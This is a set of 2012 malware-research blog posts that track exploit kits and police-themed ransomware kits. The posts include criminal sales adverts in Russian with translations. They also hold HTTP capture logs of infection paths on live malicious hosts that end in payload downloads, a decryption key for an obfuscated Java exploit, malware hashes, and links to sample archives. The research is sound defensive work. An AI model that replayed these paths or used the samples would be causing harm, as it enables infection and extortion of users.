You'll find all design (past and present) on Reveton page of botnets.fr


For malware enthousiasts :
4fc648509619859719485ec7d8618867

NeoSploit now showing "Blackhole 2.0 Like" landing pages

$
0
0
A short/fast post to answer some questions I got after my tweet about that :

NeoSploit landings before : (note : am able to put a name on this Exploit Kit thanks to Kahu Security )

NeoSploit Before


(almost nothing to see in these wepawet links)
http://wepawet.iseclab.org/view.php?hash=44beb1c3517679fec5157bf174b4e6b8&type=js
http://wepawet.iseclab.org/view.php?hash=6fcf397047639cced72c257c866b1f35&type=js
http://wepawet.iseclab.org/view.php?hash=02a91cc362f6b1f10b22ffe63d08b49a&type=js


Now :
NeoSploit Landings Now - "BH EK2.0 Like"
Plugin detect, dictionnary words separated by - and _
Note: as you see I got .htm and .php landings.

(not that much to see in these wepawet links)
http://wepawet.iseclab.org/view.php?hash=7fd1cd73934b179abc97de80afca51d5&type=js
http://wepawet.iseclab.org/view.php?hash=28391ab9e9e281ebeb2316f1428eb8eb&type=js
http://wepawet.iseclab.org/view.php?hash=253137b7ba90eb0425b026c9893d79b8&type=js

For those who wants, Fiddler sessions here  :
http://dl.dropbox.com/u/106864056/Fiddlers_5NeoSploit_3old_2new.zip
(note Fiddler had trouble handling response.

You may need to remove some bits)

Want to read more about NeoSploit ?

Neosploit Gets Java 0-Day - Darryl - 2012-09-01 - Kahu Security
Neosploit is Back! - Darryl - 2011-11-26 - Kahu Security
Shedding Light on the NeoSploit Exploit Kit - Daniel Chechik - 2011-01- M86 Security Labs
Some Notes about NeoSploit - 2010-06-04 - Fireeye

Reveton += HU, LV, SK, SI, TR (!), RO - So spreading accross Europe with 6 new Design

$
0
0
The guys behind the Reveton "Police Ransomware" are really active.
After initiating the Cool EK, refreshing all design and adding 4 maybe 5 (AU,CZ, IE, NO, DK?) targets around 10 of October  they are reaching a new step targeting at least 6 new countries among which one where they seems to be alone in this "business" ( HU, LV, SK, SI, TR (!), RO )

Reveton's Design addition in October 2012
In Turkey, 20% (!!) of the computers hitting the Exploit Kit are being locked. For many days computer there, were showing a UK design...not anymore

Reveton TR (10-2012 - First known Police Ransomware there)
Reveton SI (10-2012 -  2nd Police Ransomware there after Urausy)
Reveton SK (10-2012 - 2nd Police Ransomware there after Urausy)
Reveton LV (10-2012 - 2nd Police Ransomware there after Urausy)
Reveton HU (10-2012 - Once again come after Urausy)
Reveton RO (10-2012 - Third after Urausy and first version of Ulocker )
As usual you'll find all these design and past one on botnets.fr
Again, I would be happy to get some help to retrieve BE, PT and DK design (contact me via Twitter or kafeine at dontneedcoffee dot com )
You'll find more documentation about Reveton at the end of Reveton Autumn Collection += AU,CZ, IE, NO & 17 new design
<edit1 30/10/12>
Erratum : Slovenia = SI (merci Eric) So, it's the second one after Urausy
</edit>

Cool EK : "Hello my friend..." CVE-2012-5076

$
0
0



If you follow this blog you'll get fast sick of Cool EK and Reveton.
The Cool EK of Reveton distributors (yes it's also used by other groups, for instance the CBeplay.P ransomware distributors) is moving a lot.

Hunting for the Adobe Reader XI 0 day announced by Brian Krebs, I found a 0.7.9 PluginDetect...

PluginDetect 0.7.9 on Cool EK


that whispered me

"new" jar file on Cool EK


to check the exploit kit with Java 1.7 update 7 and....Hello my friend...the 0 day after you know...the previous 0 day (read : CVE-2012-5076 after CVE-2012-4681)

From "Battlefield" to "Hello my friend..."

<edit1 :
Note: I presumed it was CVE-2012-5067 as : it's not working on j7u9, it's working on j7u7...it could be something else thought chances were low... I was wrong.  see at the end. />
<edit5:>
Cool EK infecting Windows 7 x64 via IE9 plugin Java 7u7 and pushing Reveton Ransomware which gather it's Turkish disguise from its C&C
</edit5>
Cool EK (Reveton distributor version) CVE-2012-5076 Path

Java 1.7 u7 on IE9 - Win7


With same configuration (j7u7 + IE9 + Win7) on Cool EK from CBeplay.P distributors you'll get  :
CBeplay.P Cool EK : No  CVE-2012-5076 path

Here is the  CVE-2012-5076 working path :
http://193.1xx.120.xx/r/l/***_sessions_****.php  (including plugin detect 0.7.9 )
http://193.1xx.120.xx/r/64size_font.eot - ee1ed92474bd1de3093d056d8c4404ff (Font from duqu like drop)
http://193.1xx.120.xx/r/l/getJavaInfo.jar - fad89bdfdce9322767944f0e1f15a009 (java detect)
http://193.1xx.120.xx/r/media/new.jar - 327a1cbf1e1e06df765f959ad5b05089 ( CVE-2012-5076)
http://193.1xx.120.xx/r/f.php?k=2&e=0&f=0 - 746d7f49ceadf9315b31957f5da32fb1 (Reveton - no bypass proxy as we saw in last path of CVE-2012-4681)

new.jar in Java Decompiler


<edit2: 17:59 09/11/12>
With some help , am able to put more information about this jar file.
The bagdfssdb.class is encrypted with ZelixKlassMaster

 
So we have to take a look at the method clinit to find the key :

Method: <clinit> in bagdfssda

0000004E : tableswitch         l: 0, h: 3, def: pos.00000080, pos.(0000006C, 00000071, 00000076, 0000007B)
0000006C : bipush              55
0000006E : goto                pos.00000082
00000071 : bipush              120
00000073 : goto                pos.00000082
00000076 : bipush              64
00000078 : goto                pos.00000082
0000007B : bipush              24
0000007D : goto                pos.00000082
00000080 : bipush              81

Using the zkm_decrypt.py provided with DirtyJOE and the key [55,120, 64, 24, 81]


zkm_decrypt.py loaded in DirtyJOE
Decrypted

Applying a SUB of 0x2a we get payload.class ( 9b7481ce8aa6844e25c196c13d9250d9 )  :

Payload class in Java Decompiler.


</edit2>
What about the % break. It seems it double the rate...but starting from around 6% we are now to something around 12%. As usual it's always difficult to talk about that, as the % depends of the traffic/country..etc
In Turkey, before this CVE, break % could reach 20% where rate for Germany was between 3 and 5%

Be ready to see same kind of post for Blackhole 2.0 (or update to 2.1) soon, as chances are HUGE that Paunch is indeed behind Cool EK code.

Others changes : Old Flash exploit activated (/media/score.swf ), old PDF exploits added ( /media/pdf_old.php vs /media/pdf_new.php).
I won't spend time on this (at least right now)

Read more ?
About Cool EK :


<Edit 1: 13:14 09/11/12>
Removed the references to CVE-2012-5067

Thanks to Timo Hirvonen from F-Secure for pointing me to the correct CVE associated to this exploit.
</edit1>
<edit2: more information on this Jar file.
Thanks to Ange Albertini for his help.
</edit2>
<edit3>
I don't want to be guilty for an integration of this CVE in other Exploit Pack.
So don't expect freely avaiblable files from me as long as it's not widely used.
Password protected file :
http://dl.dropbox.com/u/106864056/CoolEK_CVE-2012-5076_and_pdfs.zip
kafeine at dontneedcoffee dot com for password.
No need to mail if you are not ready to give real name and company
</edit3>
<edit4  Jar image blurred.
Thanks to Michael Schierl
</edit4>
<edit 5 : Link in video dead, here is it. For those who do not like blur and so on :
In war, whatever your weakness/strengths are, better not help other side improve its weapons.
</edit5>


Meet CritXPack (Previously Vintage Pack)

$
0
0
CritXPack

I first heard about this Exploit Kit through a tweet from Security Obscurity (Thanks ! :) )


It was named Vintage Pack at that time :


The enrollment form was simple :

Vintage Pack form to apply


Cтоимость аренды: в месяц - 400$, в неделю - 100$
 which Google Translate as :
Cost of rent: a month - $ 400 a week - $ 100

Few days ago the banner/name changed. Here is the new "apply" form :

CritXPack apply form


Here is the text :


Rent: 30$ - 1 day; 150$ - 1 week; 500$ - 1 month; traffic limit - 100k hits per day. 

License on your server: 600$ - 3 month; 900$ - 6 month; 1200$ - 1 year; +200$ - multidomain license. 

ЗЫ: Мы сменили баннер и название, которое было использовано в течение тестового периода и проведения пробной рекламной акции. Сейчас связка работает в штатном режиме, название и баннер меняться не будут. На профильных форумах в данный момент никакой рекламы НЕТ. Отзывы от наших партнеров, пользующихся связкой и имеющих репутацию на соответствующих форумах, можно получить в ЧАСТНОМ порядке и только в случае их согласия. 

Google Translate for the Russian part :

PS: We have changed the banner and the name that was used during the test period and the Pilot promotion. Now a bunch of works in normal mode, the name and the banner will not change. On specialized forums are currently no ads NO. Reviews from our partners who use a bunch and have a reputation in the appropriate forums, you can get in private and only if they consent.


And thanks to Jindrich Kubec from Avast who shared yesterday an unusual URL pattern

Jindrich Kubec tweet about the new kind of Url

we can now say hello to CritXPack.

CritXPack Login Screen
Note the Captcha (3rd time i see this on bad guy panel, after Upas then Blackhole 2.0)
There are some double tilt counter measures (you'll get a 502 error)
There are some Geolocation features :
Filter in action for localized strike.

I tested different vuln path on it :

CVE-2012-1723 (seems safe (?!) )

CVE-2012-1723 path on CritXPack (safe)



GET http://magrety.herapid .org/b081112s/i.php
200 OK (text/html)

GET http://magrety.herapid .org/b081112s/j.php?t=u0059u0053u0072u0074u0035u0044u0053u0053u0053u0046
200 OK (application/java-archive) -- 65571830100b0d809b44fefc094b5bf4


 65571830100b0d809b44fefc094b5bf4 nicely tagged in VirusTotal



CVE-2012-4681 Boom...

CVE-2012-4681 path in CritXPack 



GET http://magrety.herapid  .org/b081112s/i.php
200 OK (text/html)

GET http://magrety.herapid  .org/b081112s/j.php?t=u0059u0053u0072u0074u0035u0044u0053u0031u0072u0072
200 OK (application/java-archive)

GET http://magrety.herapid  .org/b081112s/j.php?t=u0059u0053u0072u0074u0035u0044u0053u0031u0072u0072
200 OK (application/java-archive)

GET http://magrety.herapid  .org/b081112s/load.php?e=u004au0061u0076u0061&token=u0064u0065u0066u0061u0075u006cu0074&
200 OK (application/octet-stream)


MDAC path (Seems safe)

MDAC path on CritXPack safe but see : PluginDetect 0.7.9 :)

GET http://magrety.herapid .org/b081112s/i.php
200 OK (text/html)

GET http://magrety.herapid .org/b081112s/js/pd.js
200 OK (application/javascript)



CVE-2011-2010 path (seems safe):

CVE-2011-2010 Path on CritXPack (safe)


GET http://magrety.herapid  .org/b081112s/i.php
200 OK (text/html)

GET http://magrety.herapid  .org/b081112s/js/pd.js
200 OK (application/javascript)

GET http://magrety.herapid  .org/b081112s/a.Test
404 Not Found (text/html)

CVE-2010-0188 Boom...


CVE-2010-0188 path in CritXPack

GET http://magrety.herapid  .org/b081112s/i.php
200 OK (text/html)

GET http://magrety.herapid  .org/b081112s/js/pd.js
304 Not Modified ()

GET http://magrety.herapid  .org/b081112s/a.Test
404 Not Found (text/html)

GET http://magrety.herapid  .org/b081112s/p5.php?t=u0059u0053u0072u0074u0035u0044u0072u0072u0035u0031&oh=ZFhYT3N6ekxGakhpWFo5ZGlIRk82ZjlVSGp6bEQ1IyMjWUJ6b1VGZjlPZE9SaU00RERBRDRERHJTNEREcnJwWFVQaT1NNEREclM0RERyQTRERHJyNEREciM0REQxQTRERHJXNEREMVNw
200 OK (application/pdf) -- d23236aaa9756f74d51c42e5109d7927

GET http://magrety.herapid  .org/b081112s/load.php?e=u0050u0064u0066&token=u0064u0065u0066u0061u0075u006cu0074&
200 OK (application/octet-stream)


CVE-2011-3544 Boom...

CVE-2011-3544 Path on CritXPack

GET http://magrety.herapid  .org/b081112s/i.php
200 OK (text/html)

GET http://magrety.herapid  .org/b081112s/js/pd.js
200 OK (application/javascript)

GET http://magrety.herapid  .org/b081112s/j.php?t=u0059u0053u0072u0074u0035u0044u0031u0041u0035u0044
200 OK (application/java-archive)

GET http://magrety.herapid  .org/b081112s/load.php?e=u004au0061u0076u0061&token=u0064u0065u0066u0061u0075u006cu0074&
200 OK (application/octet-stream)

CVE-2012-0507 Boom...

CVE-2012-0507 path on CritXPack




GET http://magrety.herapid .org/b081112s/i.php
200 OK (text/html)

GET http://magrety.herapid .org/b081112s/js/pd.js
200 OK (application/javascript)

GET http://magrety.herapid .org/b081112s/j.php?t=u0059u0053u0072u0074u0035u0072u0072u0035u0053u0035
200 OK (application/java-archive)

GET http://magrety.herapid .org/b081112s/load.php?e=u004au0061u0076u0061&token=u0064u0065u0066u0061u0075u006cu0074&
200 OK (application/octet-stream)


What about the file tree of the server ?
Here are some the dir/files I was able to see:
/b081112s/load.php
/b081112s/cpt.php
/b081112s/panel.php
/b081112s/captcha.php
/b081112s/i.php
/b081112s/j.php
/b081112s/f/
/b081112s/config.php
/b081112s/img/space.png
/b081112s/img/btn_signin.png


Out of the scope of this post but what about the payload ?
a6a61216942a1de358c5b55d8fb66cb1 yesterday
and b333ccb16027f0e168ff1846ea913a58 something with a C&C here :
lezniklitoristorii   .in POST /image/ukash-psk/price.php HTTP/1.1
In my opinion it's in direct relation with the Ransomware Casier/GangstaService Affiliate. You remember ?
IE (Ireland) != IR (Iran)  (any feedback on the payload is welcome :). It's maybe just a Zbot/Citadel).

For the files all in one Zip :

Content of the Zip
http://dl.dropbox.com/u/106864056/CritXPack_Fiddlers.zip

Want to read more about CVEs and Exploit Kits ?
Common Exploit Kits 2012 Poster - 2012-11-11 Mila - Contagio <-- Look at it, it's a huge and meaning full job.
Wild Wild West - 2012-23-10 - Kahu Security
An Overview of Exploit Packs (Update 17) October 12, 2012 - 2012-10-12 Mila - Contagio

Want to read more about the payload ?

Casier on botnets.fr
Ransomware Casier - Sharing Design with Lyposit - Gaelic & Persian (?) - 2012-09-19
Ransomware « Trojan.Casier » Panel - 2012-09-18 - Malekal Morte - Malekal's Site
Karagny.L unpack - 2012-09-04 - RootBsd - Malware.lu technical analysis
Gangstaservice Winlock Affiliate - 2012-08-01 - Xylitol - Xylibox

CVE-2012-5076 - Massively adopted - Blackhole update to 2.0.1

$
0
0


CVE-2012-5076 is being adopted in a massive and fast way.
We can see the same kind of spreading as for CVE-2012-4681 at end of August 12.
---------------------------------------------------

As expected Paunch announced the integration of the new exploit in it's Blackhole with version going to 2.0.1

Paunch announcement
He wrote CVE-2012-5067... but it's the same exploit as on Cool EK so :  CVE-2012-5076


CVE-2012-5076 on BH EK 2.0 landing found on MDL

spn.jar from Blackhole Exploit Kit

Files (NB: there is one global zip at the end):
http://dl.dropbox.com/u/106864056/BHEK_CVE-2012-5076.zip

----------------------------------------------------



Sweet Orange integrated it too :

CVE-2012-5076 in SWT
CVE-2012-5076 in the jar file from SWT

Files
http://dl.dropbox.com/u/106864056/SWT_CVE-2012-5076.zip
(by the way confirmation of CVE-2011-3544 in SWT : http://dl.dropbox.com/u/106864056/SweetOrange_CVE-2011-3544.zip )
----------------------------------------------------

CVE-2012-5076 integrated to Sakura EP
CVE-2012-5076  in a jar file from Sakura EK
Files :
http://dl.dropbox.com/u/106864056/Sakura_CVE-2012-5076.zip
----------------------------------------------------



Announced.
Announcement of the update (for timestamp...oups.........yep feeling guilty....)
CVE-2012-5076 positive path on Nuclear Pack
CVE-2012-5076 in Nuclear Pack jar file
Files:
http://dl.dropbox.com/u/106864056/Nuclear_Pack_CVE-2012-5076.zip
----------------------------------------------------

"sibhost" (Have choose to stick to this name for the moment)
(exploit kit mostly spreading Urausy since months, after having pushed Reveton in june).

How do you name this ? Anyone know the real name ?

Login screen of "sibhost"


Thanks (!) Malekal for the live URL

"sibhost" spreading Urausy - Payload now included in the jar
CVE-2012-5076 in "sibhost" jar file
Files:
----------------------------------------------------


All Files :
http://dl.dropbox.com/u/106864056/CVE-2012-5076_combo.zip

Seems not incorporated in Nice Pack and CritXPack.
Didn't found SofosFO live (Emerging Threats name) but have been told (thanks C. ) that's it's CVE-2012-5076 positive.


Read more ?
A technical analysis on new Java vulnerability (CVE-2012-5076) - 15-11-2012 - Jeong Wook (Matt) Oh - MMPC

Multi Locker (+updated ver.3) - Brief History and Inside view

$
0
0


There are many "locker kit" available in the underground. Most actives seems to be Silence WinLocker, ZOIE and a new comer fast updating : Multi Locker

Original advert for Multi Locker

Text :
--------------------

Приветствую всех, кто читает этот топик.

Представляю вашему вниманию универсальный локер с распределительной системой. Это новая разработка наших кодеров.

Как это работает?

Все очень легко. Вы сливаете трафик, можете сливать определенные страны, можете сливать все что угодно. Система распределит этот трафик по странам и направит его на нужную страницу блокировки. К примеру пользователей из Европы бот отправит на страницу блокировки, где принимается Ukash и PSC, пользователей из США отправит на страницу где принимается Moneypack, пользователей из арабских стран система отправит на страничку где принимается платежная система CashU. Система делает все а автоматическом режиме. Таким образом можно лить весь трафик который у вас есть на одного бота.
Кстати, по поводу CashU. Это наше приватное направление, мы изучили этот рынок, и готовы с вами поделиться всей информацией. О том, как принимать это валюту, как выводить. Все на самом деле очень легко, если есть опыт и знания, а они у нас есть)

Особенности нашего локера:

Работаем на всех всей линейке от 2003 до Win 8.
Поддерживаем все архитектуры (x32 x64). Отстук вас очень порадует.
В качестве страницы блокировки мы выводим целые php/html страницы. Все это идет в комплекте и постоянно обновляется.
Но для любителей старых технологий у нас есть функция вывода обычных картинок, как это сделано у конкурентов.
По поводу других технических особенностей стучите в Jabber, пишите в ЛС. Могу лишь сказать, что локер писался под себя, и грамотно продуман.


Что входит в покупку?

1. Сам билд.
2. Удобная админка.
3. Свежие страницы блокировки. Мы постоянно меняем их, что придает дополнительный процент к профиту. Апдейты страниц - бесплатно.
4. Бесплатно защитим домен нашей Геораспределительной DNS системой.
5. Установка админки локера.
6. Курс по работе с локером.
7. Схемы работы по CashU.
8. Саппорт (часто Online)


Цена: 899$
Ребилд с переустановкой: 30$

В команде есть грамотный кодер, если у вас есть какие-то предпочтения, то мы их реализуем. Стучите!


Контакты:
1. jabber: support@profidns.net
2. ПМ 
--------------------
Which google translate as :
--------------------
I welcome all who are reading this thread.

Introducing you to the locker universal distribution system. This is a new development of our coders.

How does it work?

It's very easy. You are merging traffic can merge certain countries can pour anything. The system distributes the traffic by country and send it to a page lock. For example users in Europe will send a boat to the page lock that accepts Ukash and PSC, U.S. users send to the page where taken Moneypack, members of the Arab system will send to the page where the payment system is accepted CashU. The system does everything but automatic. So you can pour all the traffic that you have on a boat.
By the way, about CashU. This is our private area, we have studied the market and are ready to share with you all the information. How to take this currency, as output. It's actually very easy, if you have experience and knowledge, and we have them)

Features of our locker:

We work on all the entire range from 2003 to Win 8.
We support all architectures (x32 x64). Otstuk you very happy.
As we print page locks whole php / html page. All this comes complete and constantly updated.
But for fans of old technology, we have a common output images, as made by competitors.
For other technical features of the knock on Jabber, write to the drugs. I can only say that the locker was written by myself, and well thought out.


What is included in the purchase?

1. Self build.
2. Comfortable admin panel.
3. Fresh page locks. We constantly change them, which gives an additional percentage for profit. Updates pages - for free.
4. Defend our free domain Georaspredelitelnoy DNS system.
5. Setting admin locker.
6. A course on working with the locker.
7. Schemes for CashU.
8. A support (often Online)


Price: $ 899
Rebuild with reinstalling: $ 30

In the team there is a good coder, if you have any preferences, then we implement them. Knock!


Contacts:
1. jabber: support@profidns.net
2. PM
--------------------
The server side was based on Silence Winlocker one.

Multi-Locker ver1 Login Screen
Multi Locker v1 - Main

Multi Locker v1 - Number of connections (see the "silence locker ")

Multi Locker v1 - Payment

One month later version 2 was announced :

Text :
--------------------
1. Полностью переписанный код. Теперь наш бот - это чистое винапи. Отстук вас заметно порадует.
 2. Добавили шифратор запросов в админку. Теперь все запросы в админку шифруются.
 3. Добавлен антиреверс и антиэмулятор. Теперь бота отреверсить очень очень сложно. Дополнительно поставили защиту от виртуалок, так как большинство реверсов делается именно с виртуалок. Так что обращаем ваше внимание, теперь на виртуалках бот не работает.
 4. Поправили анлок, теперь он работает всегда и везде. Если раньше он срабатывал криво, то теперь каждые 5 минут бот стучит в админку и смотрит нет ли команды на анлок.
 5. Добавили автоматическое включение и вывод изображение с вебкамеры прямо в лендинг! Хит! Теперь это есть и у нас, а не только в приватных ботах. Заметно влияет на конверт)
 6. Теперь при создании билда вы можете указать, сделать ли задержку запуска бота или нет. И сами указываете время в секундах. Полезно тем, кто не хочет палить ресурсы, с которых юзер заражается.
 7. Защита от ввода букв. Теперь боты не смогут просто так ввести набор букв вместо ваучера. Если раньше стояла проверка на кол-во символов, то теперь проходят только цифры.
 8. Полностью новая админка. Пока что функционал тот же, но планируем добавить новые фишки. Но новый дизайн порадует глаз.
 9. Новые локер пейдж страницы! Они стали более профессиональным, добавлена виртуальная клавиатура, исправлены все ошибки.
 10. Добавлен альтернативный саппорт, который говорит по английски. Но можете его использовать как и дополнительную поддержку. ensupport@profidns.net
 Конверт по новому боту в среднем вырос на 100%!
--------------------

That google translate as :
--------------------
1. Completely rewritten code. Now our boat - it is pure VINAP. Otstuk you much delight.
 2. Added encoder queries in admin. Now all requests to the admin panel is encrypted.
 3. Anti-reverse and added antiemulyator. Now bot otreversit very difficult. Additionally put protection virtualok as most reversers is precisely virtualok. So please note, now in virtualke bot does not work.
 4. Corrected unlock, now it works anywhere, anytime. If it worked before crooked, now every 5 minutes boat knocks in admin and looks at whether the team unlock.
 5. Added a switch and the output image from webcam directly at the Landing! Hit! Now it is with us, and not just in private bots. Noticeable effect on the envelope)
 6. Now when you create the build, you can specify whether to make start-up delay bot or not. And they themselves are seconds. Useful for those who do not want to burn resources to which the user is infected.
 7. Protection letter. Now bots can not just enter a set of characters instead of the voucher. Whereas previously there were checks on the number of characters, but now are just numbers.
 8. Completely new admin panel. So far, the functionality is the same, but plan to add more chips. But the new design will please the eye.
 9. New locker Pager page! They have become more professional, added a virtual keyboard, fixed all the errors.
 10. Added alternative support hero who speaks English. But you can use it as additional support. ensupport@profidns.net
 Envelope on the new bot on average increased by 100%!
--------------------

Ver 2 was something like :
Multi Locker v2 Login Screen ( 10-2012)
Multi Locker v2 Vouchers
Multi Locker v2 Choosing what victims will see.
Multi Locker v2 Stats
Multi Locker v2 Bots list
I pushed on botnets.fr many design of Ransomware built with this kit 

Nertra (link to botnets.fr Nertra page, you'll find md5 there)

Nertra Design

Ipeur (mimic Europol) :

Ipeur Design

Vicas Design


amoung which the Anymous one (named Mlano on botnets.fr)  spotted by Abuse.ch

abuse.ch tweet showing the Multi-Locker based ransomware that impersonnate anymous group



One week ago Fretline announced a new version :

Text:
--------------------
Итак, вот и готово очередное обновление. Было проделано очень много работы.
Теперь можно сказать с гордостью, что это совсем другой, новый продукт.
Ну начнем по порядку.

1) Начиная с этой версии софт делиться на два версии.
Первая - это стандартный, старый добрый локер. Мы полностью его отладили, и теперь локер работает как часы.

Вторая версия - это наш инновационный софт, основанный на блокировки интернета на уровне DNS. Бот проникает на компьютер и блокирует интернет полностью, при попытке ввести какой-нибудь урл, пользователю отображается ваша страница блокировки.
Мы провели тщательный анализ и с уверенностью можем сказать, что это работает! Это дает конверт! В интернете нет статей на данный момент как с этим бороться и по этому можно сливать сливки. От данного вида сложно избавиться, мы блокируем даже безопасный режим на всех осях, включая семерку и восьмерку. Данный версия блокиратора будет доступен в ваших админках в ближайшее время! На данный момент проходит активное тестирование.

2) Мы полностью переписали админку. Теперь это не просто изменения скина, а админка с нуля! Мы добавили кучу новой функциональностей и внедрили новый, юзер-френдли интерфейс. Об этому по порядку ниже.



3) Теперь не покидая админки вы можете изменить дизайн или текст лендинга с помощью встроенного редактора лендингов.
Мы позаботились о экономии вашего времени.






4) Кстати о Лендингах. Специально для тех клиентов, кто работает по Европе мы сделали качественные переводы по большому количеству стран. А именно: Австрия, Бельгия, Чехия, Кипр, Германия, Испания, Финляндия, Франция, Британия, Греция, Италия, Нидерланды, Польша, Португалия, Румыния, Швеция.

5) Добавили функцию смены пароля и выхода из админки, такая банальность, но в прошлой версии до этого руки не доходили.

6) Добавили раздел обратной связи прямо в админку. Теперь если нас нет в сети, смело можете оставить свое сообщение, как саппорт появится, сразу разберет вашу проблему.

7) Стандартный скин по ЮСЕ был переработан в плане лингвистики, теперь там грамотный текст.

8) По европе появилась возможность выбора номинала 50 - 100 EURO прямо при вбиве ваучера. По юсе можете редактировать через встроенный редактор.

9) Новый раздел Аналетика. Будет доступен с выходом DNS версии локера, включает в себя огромный раздел со статистикой. С красивыми графиками, можете отслеживать из каких городов и каких провайдеров люди более платежеспособные и тп. 

10) Изменили шифрования связи между ботом и админкой. Благодаря этому ваши сервера и домены будут реже попадать в блеки. И самое главное, теперь мы можем привязать админку к конкретному билдеру, что дает нам возможность продавать вам билдер! 

11) Добавили возможность стучать боту на несколько доменов сразу, полезна функция тем, что если ваш домен или сервер залетел в блек, данные будут слаться на запасной. В стандартном локере это не реализовано, так как мы постепенно планируем от него избавиться и перейти только на DNS блокиратор.

12) Добавил раздел мануал с ссылкой на текстовый файл. Пока что мануал не написал, сделаю это завтра-послезавтра.
--------------------
That google translate as :
--------------------
So, that's the next update is ready. Had done a lot of work.
Now we can say with pride that this is another new product.
Well let's start from the beginning.

1) Starting with this version of the software is divided into two versions.
First - this is the standard, good old locker. We fully tested them, and now works as a locker watch.

The second version - this is our innovative software based on Internet blocking at the DNS. Boat gets on the computer and completely blocks the Internet, if you try to enter any URL, the user is presented your page lock.
We conducted a thorough analysis and can say with confidence that it works! This gives the envelope! On the Internet there are no articles at this time how to deal with and this can be poured cream. From this kind of difficult to get rid of, we block even safe mode on all axes, including seven and eight. This version of the lock will be available in your admin area in the near future! At the moment is active testing.

2) We completely rewrote the admin area. Now this is not just a change skins, admin panel from scratch! We added a bunch of new features, and introduced a new, user-friendly reputation interface. On this order below.


3) Now, without leaving the admin you can change the design or text Landing with built-in editor Landing.
We took care of saving your time.


4) Speaking of the Landing. Especially for those customers who are working in Europe we have made high-quality translations for a large number of countries. These are: Austria, Belgium, Czech Republic, Cyprus, Germany, Spain, Finland, France, Great Britain, Greece, Italy, Netherlands, Poland, Portugal, Romania, Sweden.

5) Add the function of password changes and exit the admin, so commonplace, but in the last version before the hands do not reach.

6) Add a feedback section right in the admin area. Now, if we do not have a network, you can safely leave your message will appear as a support, just make out your problem.

7) Standard theme was Yuce was redesigned in terms of linguistics, now there is a literate text.

8) In Europe it is possible the nominal 50 - 100 EURO right when driving a voucher. By Yuce edit a built-in editor.

9) A new section Analetika. It will be available with the release version of the DNS locker includes a huge section with statistics. With beautiful graphics, you can keep track of which cities and which providers they may be more solvent and etc..

10) Change the encryption between the bot and the admin. Thanks to your server and the domain will be less likely to get in the black. And most importantly, we are able to bind to a specific admin Builder, which allows us to sell you a builder!

11) added the ability to knock the bot multiple domains at once, useful feature is that if your domain or server flew in the black, the data will be send to spare. The standard locker is not implemented, because we plan to gradually get rid of it and go only to DNS blocker.

12) added a section to the manual reference to a text file. So far, the manual has not, I'll do it tomorrow or the day after.
--------------------

Few days after it was already wild, dropped for instance by a Blackhole Exploit Kit ( http://cassettesbeauty .org/lived/messy-intention.php -- 91.220.35.42 ) or pushed in botnets (seen in a Smoke Bot)

Installer interface of the Server Side for Multi Locker ver.3


Data for the blackhole one :
dcc555650208c2ec531f873d0e2f6b1f -  studiounsecured .org GET /lending/tds.php  - 91.220.35.147

This one was using same design as the one showed in ULocker page on botnets.fr (but it's not the ULocker infiltrated by Xylitol in august 2012)


One Multi Locker ( dcc555650208c2ec531f873d0e2f6b1f )pushing same Design than the one initiated by ULocker
Some were seen with Design not far from the Reveton one, pushed in Smoke Bot and Sakura as far as i know


And here is how it looks inside (code is not really pro, but result is kind of good) :

Multi Locker v3 Home
Standard Locker / DNS Internet Locker are not working now.

Multi Locker v3 - Analytics botnet


Данный раздел будет доступен с выходом DNS Locker Версии.
translate by google as :
This section will be available with the release of DNS Locker Version.

Multi Locker v3 - Stats - Bots
Multi Locker v3 - Staff - Billing
Multi Locker v3 - Lending Page

Multi Locker v3 - Lending Page Editor

Multi Locker v3 - Editing the EN Page
This is advanced. The default design allow you to customize many part of the Ransom page.
But maybe not basic enough for some bad guys ;)

We can bet the Conversion Rate on this one won't be good :D
Multi Locker v3 - Admin - Support
Multi Locker v3 - Admin - Change Password
Files (server side - private password)
http://dl.dropbox.com/u/106864056/ServerSide_v2_and_v3.zip

Reveton can speak now !

$
0
0

More than 24 hours without a new sample...detection for dropped Reveton growing to 11/43 on VirusTotal, something was happening for sure.

And yes...After Silence Winlocker integrating sound (for instance a voice saying "FBI warning your computer is Blocked for violation of Federal Law" )  now Reveton will speak to you


US:

FR:

GB:



NL:

IT:

DE:


CZ:


Will add existing language am aware of here in the future.

Md5 : 74aa8610db56b2bb7bd948b610780624 Dll entry is still GOF1
File : http://dl.dropbox.com/u/106864056/74aa8610db56b2bb7bd948b610780624.zip (default password for infected stuff, compressed with 7z)


Wants to read more about Reveton ?
Reveton += HU, LV, SK, SI, TR (!), RO - So spreading accross Europe with 6 new Design 2012-10-29
Reveton Autumn Collection += AU,CZ, IE, NO & 17 new design 2012-10-24

More about Silence Winlocker 5.0 :
Silence Winlocker 5.0 by Xylitol 2012-10-25 Xylibox

Upas Kit (aka Rombrast) integrates webinjects

$
0
0


Announcement by Auroras


Text:
------------------------
webinjects завершено. завершается документация и подготовляем продукт к продажи. на этой неделе цена 2,000$ для модуля, на след недели 3,000$, сделайте предзаказ сейчас что бы получить дешевле!
------------------------
translated by Google as :
------------------------
webinjects completed. complete documentation and prepare the product for sale. this week's price $ 2,000 for the module next week $ 3,000, pre-order now to get cheaper!
------------------------


Demo video posted with announcement.

Emerging Banker ?

For those who like visual things (cf Read More end of Post) :


Upas Login Screen (v1.0 may have change)



More about Upas kit ?
Inside Upas Kit (1.0.1.1) aka Rombrast C&C - Botnet Control Panel 2012-08-16
Анализ http-бота Upas Kit - Onthar  - Onthar.in

Meet ProPack Exploit Pack - yes that's a lot of pack

$
0
0



Initial ProPack Exploit Pack announcement (20-10-2012)

Text:
------------------------------------------

ProPack exploit pack - профессиональная связка в аренду на Вашем сервере.

И так, мы рады представить новый продукт на рынке - ProPack exploit pack.

"Каждый выбирает для себя что-то свое: кому то шашечки, а кому то ехать...
Мы не можем похвастаться креативным дизайном, удобством интерфейса, дополнительными гаджетами.
Минимализм в оформлении, высокое быстродействие и пробив - ключевые моменты на которые мы обращали внимание при создании нашего продукта.

Основные черты нашего продукта:

-Высочайшее быстродействие:
технология буфера, все ресурсоемкие операции выполняются в режиме пакетной пост-обработки
применение самого быстрого на сегодня SypexGeo вместо MaxMind GeoIP для определения стран посетителей
технология независимых потоков - нет необходимости введения дополнительного параметра и прогона по базе

-Высокий пробив, обусловленный:
высочайшей производительностью выдачи
малым размером файлов сплойтов и нересурсоемким js криптом
современным набором эксплойтов:

java aio - java all in one или 3 эксплойта java atomic, java byte, java 7 в одном .jar файле (не забыли и про 5ую ветку Java)
libtiff - эксплойт под Adobe Reader 8-9 веток
